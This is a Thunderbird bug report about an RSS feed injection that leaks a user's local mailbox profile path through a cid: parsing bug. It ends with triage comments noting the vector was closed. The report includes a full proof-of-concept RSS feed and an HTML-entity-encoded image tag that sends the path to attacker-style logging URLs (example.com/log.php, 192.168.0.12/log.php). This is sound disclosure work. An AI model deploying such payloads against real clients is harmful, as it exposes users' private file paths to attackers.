Closed Bug 1411713 Opened 7 years ago Closed 6 years ago

TBE-01-013: RSS Local Path Leak via cid: Parsing Bug

Categories

(MailNews Core :: MIME, defect)

Product:
MailNews Core
Component:
MIME
Type:
defect
Priority:
Not set
Severity:
critical

Tracking

(Not tracked)

Status:
RESOLVED WORKSFORME

People

(Reporter: BenB, Unassigned)

Details

(Keywords: csectype-disclosure, privacy, sec-moderate, Whiteboard: [attack vectors closed?])

As described in TBE-01-011, it is possible to influence the created email structure of an RSS feed item. This allows to embed attachments and reference them via the cid: protocol. 4 This protocol handler can reference an attachment via its defined Content-ID header. Since the RSS feed operates on the local file-system environment, Thunderbird converts a specified cid: handler to the mailbox:/// protocol. This would normally not be a problem as JavaScript is not executed and therefore it is not possible to extract the mailbox:/// URL. However, it was discovered that Thunderbird suffers from the following parsing bug, which allows to leak the mailbox:// URL to an attacker-controlled server. 3 4 https://www.fxsitecompat.com/en-CA/docs/2015/moz-document-support-has-been-dropped/ https://tools.ietf.org/html/rfc2392 Email Body: <img src="&#x68;&#x74;&#x74;&#x70;&#x3A;&#x2F;&#x2F;&#x65;&#x78;&#x61;&#x6D;&#x70;&#x 6C;&#x65;&#x2E;&#x63;&#x6F;&#x6D;&#x2F;&#x6C;&#x6F;&#x67;&#x2E;&#x70;&#x68;&#x70 ;&#x3F;&#x0A;&#x0A;cid:aaaaab"> Decoded HTML Entity Payload: http://example.com/log.php? Parsed by Thunderbird: <img src="http://example.com/log.php? mailbox:///C:/Users/UserNAme/AppData/Roaming/Thunderbird/Profiles/anrhqp9r.pgp/M ail/Feeds/Feed1?number=1&part=1.1.3&filename=test.html"> Thunderbird will then try to fetch the specified image from the attacker's web server. In doing so, it will leak the local file path to the RSS feed. The following RSS feed contains an example of this behavior. It will reference the injected file attachment, which is then leaked to the attacker's web server. PoC: <?xml version="1.0" encoding="UTF-8"?> <rss xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0" > <channel> <title>Feed1</title> <link>aaa</link> <item> <title>Feed1</title> <guid isPermaLink="false">myguid&gt;&#x0a;Content-Type: multipart/alternative; boundary="------------ 2DEE3F98D70BD2C65FBA7373"&#x0a;MIME-Version: 1.0&#x0a;Subject: feed1&#x0a;From: test@example.com&#x0a;To: test@example.com&#x0a;&#x0a;This is a multi-part message in MIME format.&#x0a;-------------- 2DEE3F98D70BD2C65FBA7373&#x0a;Content-Type: multipart/related; boundary="------------A320A96F6639F3C578F35383"&#x0a;&#x0a;&#x0a;-------------- A320A96F6639F3C578F35383&#x0a;Content-ID: myself&#x0a;Content-Type: text/html&#x0a;Content-Transfer-Encoding: 7Bit&#x0a;&#x0a;&lt;img src="&#x68;&#x74;&#x74;&#x70;&#x3A;&#x2F;&#x2F;&#x31;&#x39;&#x32;&#x2E;&#x31;&#x 36;&#x38;&#x2E;&#x30;&#x2E;&#x31;&#x32;&#x2F;&#x6C;&#x6F;&#x67;&#x2E;&#x70;&#x68 ;&#x70;&#x3F;&#x0A;&#x0A;cid:aaaaab"&gt;&#x0a;-------------- A320A96F6639F3C578F35383&#x0a;Content-ID: aaaaab&#x0a;Content-Type: image/svg+xml&#x0a;Content-Transfer-Encoding: 7bit&#x0a;Content-Disposition: attachment; filename="test.svg"&#x0a;&#x0a;a&#x0a;&#x0a;-------------- A320A96F6639F3C578F35383--&#x0a;&#x0a;--------------2DEE3F98D70BD2C65FBA7373-- &#x0a;&#x0a;&#x0a;&#x0a;&#x0a;</guid> </item> </channel> </rss> Email Body: From - Thu, 28 Sep 2017 14:18:48 +0200 X-Mozilla-Status: 0041 X-Mozilla-Status2: 00000000 X-Mozilla-Keys: Received: by localhost; Thu, 28 Sep 2017 14:18:48 +0200 Date: Thu, 28 Sep 2017 14:18:48 +0200 Message-Id: <myguid> Content-Type: multipart/alternative; boundary="------------ 2DEE3F98D70BD2C65FBA7373" MIME-Version: 1.0 Subject: feed1 From: test@example.com To: test@example.com This is a multi-part message in MIME format. --------------2DEE3F98D70BD2C65FBA7373 Content-Type: multipart/related; boundary="------------A320A96F6639F3C578F35383" --------------A320A96F6639F3C578F35383 Content-ID: myself Content-Type: text/html Content-Transfer-Encoding: 7Bit <img src="http://192.168.0.12/log.php? cid:aaaaab"> --------------A320A96F6639F3C578F35383 Content-ID: aaaaab Content-Type: image/svg+xml Content-Transfer-Encoding: 7bit Content-Disposition: attachment; filename="test.svg" a --------------A320A96F6639F3C578F35383-- --------------2DEE3F98D70BD2C65FBA7373--@localhost.localdomain> From: Feed1 MIME-Version: 1.0 Subject: Feed1 Content-Transfer-Encoding: 8bit Content-Base: Content-Type: text/html; charset=UTF-8 <html> <head> <title>Feed1</title> <base href=""> </head> <body id="msgFeedSummaryBody" selected="false"> Feed1 </body> </html> It is recommended to check the parsing code of the cid: protocol and investigate why it does not detect a prepended encoded HTTP URL.
Group: mail-core-security
For the original report as PDF; see bug 1411701.
Bug 1411699 will close the vector for injection of such a crafted eml via feed parsing. However, there are likely numerous ways to hand craft mime structures to break/leak in libmime. This bug belongs to that component imo.
Component: Feed Reader → MIME
Keywords: csectype-disclosure, privacy, sec-moderate
Summary: RSS Local Path Leak via cid: Parsing Bug → TBE-01-013: RSS Local Path Leak via cid: Parsing Bug
Whiteboard: [attack vectors closed?]

alta88, I'm wondering if there is anything specific left to do in this bug, or if it would be better to open new issues for any further attack vectors?

Flags: needinfo?(alta88)

I created a feed file with the PoC part above, adjusting for the wrapping there (it fails as invalid xml), adjusting for missing tags (that the parser fails it on), and a message was stored with a long messageId but no other content. So yes, a new vector needs to be found to exploit the cid, post Bug 1411699.

It would be good to ask cure53 to recheck on the 68 esr version.

Flags: needinfo?(alta88)
Status: NEW → RESOLVED
Closed: 6 years ago
Resolution: --- → WORKSFORME
Group: mail-core-security
You need to log in before you can comment on or make changes to this bug.